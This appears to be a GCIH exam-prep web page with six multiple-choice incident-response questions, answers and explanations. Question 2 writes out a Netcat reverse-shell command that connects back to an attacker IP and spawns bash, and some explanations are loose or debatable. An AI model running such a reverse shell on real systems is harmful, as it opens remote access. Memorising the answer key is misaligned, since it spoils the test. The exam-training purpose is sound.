Free GCIH Incident Response & Cyber Investigation Practice Test 2026 — GIAC Incident Handler Questions

This free GCIH Incident Response & Cyber Investigation practice test covers incident response and cyber investigation — the PICERL lifecycle (Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned), evidence handling, chain of custody, and IR documentation. Each question includes a detailed explanation — perfect for GIAC Certified Incident Handler / SANS SEC504 exam prep.

Key Topics in GCIH Incident Response & Cyber Investigation

6 Free GCIH Incident Response & Cyber Investigation Practice Questions with Answers

Sample Question 1 — Incident Response and Cyber Investigation

During an incident response, what is the correct order of steps in the PICERL methodology?

  1. A. Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned (Correct answer)
  2. B. Identification, Preparation, Containment, Eradication, Recovery, Lessons Learned
  3. C. Preparation, Containment, Identification, Eradication, Recovery, Lessons Learned
  4. D. Identification, Containment, Preparation, Eradication, Recovery, Lessons Learned

Correct answer: A

Explanation: PICERL stands for Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. This is the standard incident response methodology used by security teams to systematically handle cybersecurity incidents.

Sample Question 2 — Incident Response and Cyber Investigation

During an incident response investigation, you suspect that a compromised system is being used for data exfiltration through a covert channel. You find evidence of Netcat being used on the system. Which of the following Netcat commands would most likely indicate a reverse shell used for data exfiltration?

  1. A. nc -lvp 4444 -e /bin/bash
  2. B. nc -e /bin/bash 192.168.1.100 4444 (Correct answer)
  3. C. nc 192.168.1.100 4444 < /dev/null
  4. D. nc -l -p 4444 > output.txt

Correct answer: B

Explanation: Option B represents a reverse shell initiated by the compromised system, connecting back to the attacker's machine at IP address 192.168.1.100 on port 4444 and executing /bin/bash. This is a common method for establishing a covert channel for data exfiltration. Option A is a listener command, which is not used for initiating a reverse connection. Option C is a simple TCP connection that doesn't execute a shell. Option D is a listener that writes incoming data to a file, not a reverse shell.

Sample Question 3 — Incident Response and Cyber Investigation

You are part of an incident response team investigating a suspected case of privilege escalation on a Windows server. During your analysis, you notice unusual PowerShell activity in the logs. Which of the following PowerShell commands is most likely used for privilege escalation?

  1. A. Get-Process | Out-File -FilePath processes.txt
  2. B. Invoke-Expression -Command 'Start-Process PowerShell -Verb RunAs' (Correct answer)
  3. C. Get-Content -Path C:\Windows\System32\drivers\etc\hosts
  4. D. Set-ExecutionPolicy RemoteSigned

Correct answer: B

Explanation: Option B uses 'Invoke-Expression' to run a PowerShell process with elevated privileges ('-Verb RunAs'), which is a common technique for privilege escalation. Option A simply outputs process information to a file and does not involve privilege escalation. Option C reads the hosts file, which is not related to privilege escalation. Option D changes the execution policy for scripts but does not directly escalate privileges.

Sample Question 4 — Incident Response and Cyber Investigation

A financial institution's network monitoring system has detected unusual outbound traffic from a critical server. As the incident handler, what is the most effective initial action you should take to investigate this incident?

  1. A. Immediately disconnect the server from the network to prevent data exfiltration.
  2. B. Use Wireshark to capture and analyze the network traffic from the server. (Correct answer)
  3. C. Run a full antivirus scan on the server to check for malware.
  4. D. Check the server's firewall logs for any unauthorized access attempts.

Correct answer: B

Explanation: The most effective initial action is to use Wireshark to capture and analyze the network traffic from the server (Option B). This step allows you to understand the nature of the outbound traffic, identify potential data exfiltration, and gather evidence without immediately disrupting operations. Disconnecting the server (Option A) might be necessary later but could destroy volatile evidence and disrupt business processes. Running an antivirus scan (Option C) is a good step for later in the investigation but won't provide immediate insight into the network activity. Checking firewall logs (Option D) could be useful but may not directly address the unusual outbound traffic issue.

Sample Question 5 — Incident Response and Cyber Investigation

During an incident response, you notice unusual outbound traffic from a critical server. What is the most effective initial action to take?

  1. A. Shut down the server immediately to prevent data exfiltration.
  2. B. Capture a packet trace using Wireshark to analyze the traffic. (Correct answer)
  3. C. Conduct a full vulnerability scan on the server using Nmap.
  4. D. Notify management and await further instructions.

Correct answer: B

Explanation: Capturing a packet trace with Wireshark is the most effective initial action because it allows you to analyze the traffic in real-time and gather evidence without disrupting the server's operations. Shutting down the server (Option A) may prevent further exfiltration but also destroys volatile evidence. Conducting a full vulnerability scan (Option C) is not an immediate action and could disrupt the server. Notifying management (Option D) is important, but it should be done concurrently with immediate evidence gathering.

Sample Question 6 — Incident Response and Cyber Investigation

You are the first responder to a suspected malware infection on a workstation. What is the best first step you should take?

  1. A. Isolate the workstation from the network. (Correct answer)
  2. B. Delete the suspicious files.
  3. C. Run a full antivirus scan.
  4. D. Reboot the workstation in safe mode.

Correct answer: A

Explanation: Isolating the workstation from the network is the best first step as it prevents the potential spread of malware to other systems while preserving the current state for further analysis. Deleting files (Option B) could destroy evidence. Running a full antivirus scan (Option C) is useful but should be done after isolation to prevent further spread. Rebooting in safe mode (Option D) could alter the system state and is not an immediate containment action.

About the GCIH Exam

Other GCIH Practice Domains

Start the free GCIH Incident Response & Cyber Investigation practice test now | 10-question quick start | All GCIH domains